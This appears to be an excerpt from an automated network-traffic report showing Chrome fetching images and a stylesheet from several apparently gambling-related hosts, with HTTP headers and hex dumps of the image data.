                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC639OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-4370"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 9989224490109819971
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:21 UTC880INData Raw: e8 d3 8c 1d 90 7f 16 14 04 93 eb aa 48 e9 dc 80 85 60 c9 bc 80 00 71 50 a9 f0 f4 d4 cb b2 40 2d 10 9d e5 f7 13 1a b7 45 eb f3 0f 4d 30 4c b1 70 a8 a5 36 53 e6 5a b0 1d 7a f9 e9 49 20 b4 5a 22 87 5f c6 0f 43 5f 0f bb 4c 12 5b 37 e0 25 81 0f 21 dc 0f a8 f5 d1 20 58 a4 cb 78 3e 66 75 a5 6a 8d d3 ee d1 64 5c 28 94 cf 55 14 d7 b4 92 59 00 b1 00 02 49 e8 00 d3 a4 9e 41 6f 19 25 a7 72 aa bf fb 6b f8 9b ef f0 03 e3 a7 01 25 66 5a 71 bc 86 15 ac 32 63 1d 16 5c 14 df 26 3d 18 86 8a bd 43 25 4e d7 34 f5 d3 a6 25 7b 31 cd d7 25 6f 2e 3f 1f 69 2c 51 3a d2 f2 69 08 46 d9 42 5a 30 05 69 5a 50 9f 4f 0d 30 49 57 d7 52 cb 7d 37 76 66 2f 24 9b 52 38 63 5e 81 54 51 23 8d 7c 80 1d 00 d3 92 d8 24 07 14 b9 4f a7 89 90 11 de 5f c4 80 d5 63 3d 3a 54 7e 26 f2 3e 43 4e 07 14 fa 9f
                                                                                                                                                          Data Ascii: H`qP@-EM0Lp6SZzI Z"_C_L[7%! Xx>fujd\(UYIAo%rk%fZq2c\&=C%N4%{1%o.?i,Q:iFBZ0iZPO0IWR}7vf/$R8c^TQ#|$O_c=:T~&>CN


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          603192.168.2.55038423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC611OUTGET /pc/image-pc/index/382/footer/icon_slot.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2340
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-924"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[5],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473788
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 65a84a8cfa5113035751f95114d712e4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118212
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC2340INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          604192.168.2.55038690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC379OUTGET /pc/image-pc/index/382/top/icon_user.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1102
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:17 GMT
                                                                                                                                                          ETag: "64c0a20d-44e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE25[4],EU-FRA-paris-GLOBAL1-CACHE17[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063150
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 202050abeb9fb0fd23bbae26f5690ba6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1102INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 11 08 06 00 00 00 ed c8 9d 9f 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          605192.168.2.55038790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC607OUTGET /pc/image-pc/index/312/nav/casino/04.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40589
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:45 GMT
                                                                                                                                                          ETag: "5d71fe7d-9e8d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE14[2],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b8dc62084a17088fbafa84a11c5e2049
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 9c 5d d7 79 ef 8f bf 17 ec bd 0f 9f 61 69 46 6c 4b 96 6c d9 32 c7 31 c4 6c 27 4e 1c ae 1b 66 70 18 4a b7 69 7b 9b de 62 6e 31 0d 35 49 03 0e 43 d3 a0 63 c7 cc 0c b2 2d 8b 2c d6 48 1a 0d cf e1 4d 6b ad df 1f fb cc 48 76 1a 6a d2 de fb fa dd ef f2 eb 78 ce 8c 0e ac bd d7 b3 9e f5 c0 e7 f9 3c 82 ff c3 43 22 7f ad f7 5b ec af 3f 89 dc b1 9c fb c6 7f 1a 9a ab 1c b7 f9 90 d2 03 1a c7 48 d4 6a 0c
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxu]yaiFlKl21l'NfpJi{bn15ICc-,HMkHvjx<C"[?Hj
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: f8 89 7a e0 63 1f 6b e2 92 85 a9 a4 06 94 2e 62 28 51 2e 79 2b 4c ce 3b 66 cd fb de ea 72 c9 e1 a6 6d ef df 7e fb 97 3e 7a 10 17 a1 24 dd 9c 90 64 6e b6 76 c2 3f fc e3 47 af 58 be bc bf af 6f a8 87 42 14 93 13 31 61 bb 45 14 c1 93 5b b6 b1 5d 49 56 2c 5b c2 5f 7e e4 8b ec a9 59 76 8c a7 f8 a5 15 94 8b 05 5a 51 56 6b b3 6f f7 28 d7 5f 77 23 a1 d6 7d 97 5c 7e f1 15 bd 2b 97 3e b8 7b 6b 7d 4b c1 0a 02 df 27 b5 29 46 f9 e9 0b 5f f5 8a 5b 7e f2 9d ef 5c b2 7b db d6 a5 b5 7a 8d c5 49 44 75 60 80 5c 33 25 9d ab 61 8c 63 a8 52 a5 56 ab e1 29 85 b5 86 4e ab 45 b3 56 a7 58 2a 65 8d a5 5c e6 91 08 a5 32 e8 c1 3c 41 8e 80 5a ab cd 6c bd 41 a1 5a c4 cf 2b bc 8e 64 7a 66 9a 25 3d 7d 4c d5 da e8 5c 91 a9 e9 09 d4 8a 1e 72 be ea 1e 67 96 c0 93 94 7a fb 68 b7 5a ec ab 37
                                                                                                                                                          Data Ascii: zck.b(Q.y+L;frm~>z$dnv?GXoB1aE[]IV,[_~YvZQVko(_w#}\~+>{k}K')F_[~\{zIDu`\3%acRV)NEVX*e\2<AZlAZ+dzf%=}L\rgzhZ7
                                                                                                                                                          2024-06-09 22:41:21 UTC8437INData Raw: a5 a4 69 3a 47 43 51 42 20 53 7b cc 5f 70 e0 84 c1 7e d6 9c 7d 3a 63 a3 87 69 b4 1a 84 46 30 d9 4c 38 38 d5 64 f7 68 93 dd 63 33 1c ae 36 49 f2 45 92 5c 9e 40 79 44 5a 50 2c 77 a7 27 9f 79 ce 53 c3 53 cd ec 8d 9f ff f2 65 9b 37 8f 16 88 61 e5 69 65 7a fb b2 5c b4 61 a5 97 d4 47 4f 75 75 03 87 e4 97 26 de 49 23 51 c2 f9 d6 c6 8d 97 7f 45 09 61 10 2e 88 1c 98 2c b1 ca 76 9f 7f f5 5b 7f 2b 7b f6 b9 ce b6 2f 7c 71 1a 9d 7c 4b 26 81 c1 09 80 3a ae f4 30 68 d2 38 44 ea 90 ac aa 81 3b c3 fd ff fe 89 31 1d d7 ff 30 e3 77 54 c3 24 97 0b 02 35 bf 15 a6 3f fc 99 c1 7a dc fe 57 09 f1 dc 95 e3 3f af 24 c7 df 8e 0f 2a 1b 2c 29 aa bd a8 9a d9 05 2b 0d 38 f2 e8 9d 93 53 4f 6c 4b 97 bc fa 5d b9 a1 b3 d6 bd b4 43 8e ec bb fb 33 1f 7b 1c d1 cb 4b de f2 fe ce 5d 8f 3c 18 18
                                                                                                                                                          Data Ascii: i:GCQB S{_p~}:ciF0L88dhc36IE\@yDZP,w'ySSe7aiez\aGOuu&I#QEa.,v[+{/|q|K&:0h8D;10wT$5?zW?$*,)+8SOlK]C3{K]<


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          606192.168.2.55038890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC607OUTGET /pc/image-pc/index/312/nav/casino/05.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40880
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:46 GMT
                                                                                                                                                          ETag: "5d71fe7e-9fb0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE10[284],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,282],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 703efac76ea8aa6420fa01323c9f2620
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105851
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 9c 25 d7 79 e7 01 7f cf 29 bc d8 0c d3 c3 a4 01 0d 89 46 cc b2 2d b0 9d 98 51 66 86 38 d9 6c 38 9b 8d 37 d9 4d 36 9b 64 93 d8 8e 19 63 3b a6 98 49 92 45 23 e6 99 d1 30 f7 34 f3 ed 4b 85 e7 9c f7 8f ba dd 33 92 1d c7 8a 77 d7 fb be fb 1e 7d 6a 3e d3 9a be 75 4f 55 3d f5 e0 ef f9 3d 82 ff a7 97 c4 16 36 a9 b7 9c 8b 5e f7 17 bd cd ee cd fb e7 bc 7c 37 46 d1 53 ad d4 fa d5 f0 96 db fe f1 dd a7
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxu%y)F-Qf8l87M6dc;IE#04K3w}j>uOU==6^|7FS
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 4b 97 86 65 9b ce 95 71 ae b8 b9 bc ba ab 7b fb b9 57 36 66 d3 dc 58 3a 3b 78 74 ec 9f 7e 3f cc 28 d3 21 8d b3 fa 91 e3 5a 5b e3 d4 20 ff 17 b0 3e 0b 73 36 84 41 a3 74 2a fd 9c ec 9a 99 18 b5 6b b3 b3 14 7a 97 a0 f4 1c 95 ea 3c 61 12 32 57 ad 70 f4 c4 51 72 5e 27 39 bf 0d 49 1d 25 43 f2 b6 60 55 ff 12 ae dc b9 13 79 c1 45 9c 38 3e cc be 7d fb 38 3d 79 82 43 8f 1f a3 bf 94 a7 a3 a3 8f 20 9c 27 9a 3c c9 8e a5 79 2e 5c bd 83 66 bd 8a 8a 12 8a 6e 07 4b 3a 97 b3 ef c9 c3 9c 3a 3a c8 b2 fe 6e 36 6d da c2 65 db b7 61 5b 2e 07 4f 8e d1 a8 34 19 1c 9f c4 71 7d f2 ae 85 e3 6a 46 06 8f 31 5b 9b 47 6b 9b 20 d1 68 a3 e9 ef 69 a7 1a c6 9c 1e 99 a2 6b be da 9e ef f1 5d 4b c8 33 c8 ea 5f 62 d9 76 f6 cc 1c c7 d9 0a 29 b8 11 88 84 15 2f 7c bb db be ec a2 f5 4e 9a 0c d8 6a
                                                                                                                                                          Data Ascii: Keq{W6fX:;xt~?(!Z[ >s6At*kz<a2WpQr^'9I%C`UyE8>}8=yC '<y.\fnK:::n6mea[.O4q}jF1[Gk hik]K3_bv)/|Nj
                                                                                                                                                          2024-06-09 22:41:21 UTC8741INData Raw: f8 7e 81 52 a9 8d 6a a5 83 62 a9 0d c7 cb e1 39 3e ae a3 c8 65 f0 d1 28 69 d0 0c a7 19 9f 18 66 c7 ce ad ac 5f b7 9e bd 7b 47 11 69 8e b0 e6 30 b0 6b 8a ae f6 05 f4 cd 59 02 c2 a1 11 36 08 c2 3a ed 79 85 3b 31 42 47 21 47 6c 24 ed 8b 17 d3 7b d2 f1 d0 d1 0e 5e 91 e7 37 ee 64 e3 96 a1 ab 3f f8 b9 af 7f b2 01 c4 0e 18 47 82 2e 8a 63 ff fc ea c3 83 39 07 4c 6e fd d9 57 a6 07 d6 dd f5 c2 dc e3 5e b3 74 e9 71 c7 f5 6c 7f f0 8e 3d 30 cc f6 47 ef d9 b3 64 79 ff 5e 4f e5 17 be b0 79 70 90 86 63 10 6d a0 cb 50 e8 b0 b1 6a 76 52 48 a9 10 3a b5 26 62 5c 1b e3 88 d9 e2 8b 9a cd a5 5a 56 a3 41 07 8c ee dc a8 11 0d 30 31 b3 40 d0 97 70 59 92 ec 01 ed 11 d5 7d d0 aa d1 27 6e fe d9 66 1a 35 73 c2 45 57 74 38 e5 f9 67 44 b1 de 3d bc f6 81 11 4c 04 32 a1 25 28 41 a6 d3 fc
                                                                                                                                                          Data Ascii: ~Rjb9>e(if_{Gi0kY6:y;1BG!Gl${^7d?G.c9LnW^tql=0Gdy^OypcmPjvRH:&b\ZVA01@pY}'nf5sEWt8gD=L2%(A


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          607192.168.2.550385183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC661OUTGET /061410/rcenter/common/themes/default/font-awesome/font-awesome.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC658INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-09-02
                                                                                                                                                          ETag: W/"655579ca-5df0"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:21 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xianymp09:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XIANY-MP-09-02
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-17
                                                                                                                                                          X-Cdn-Request-ID: dde6de2b01eff0b8841ee9a793ab5233
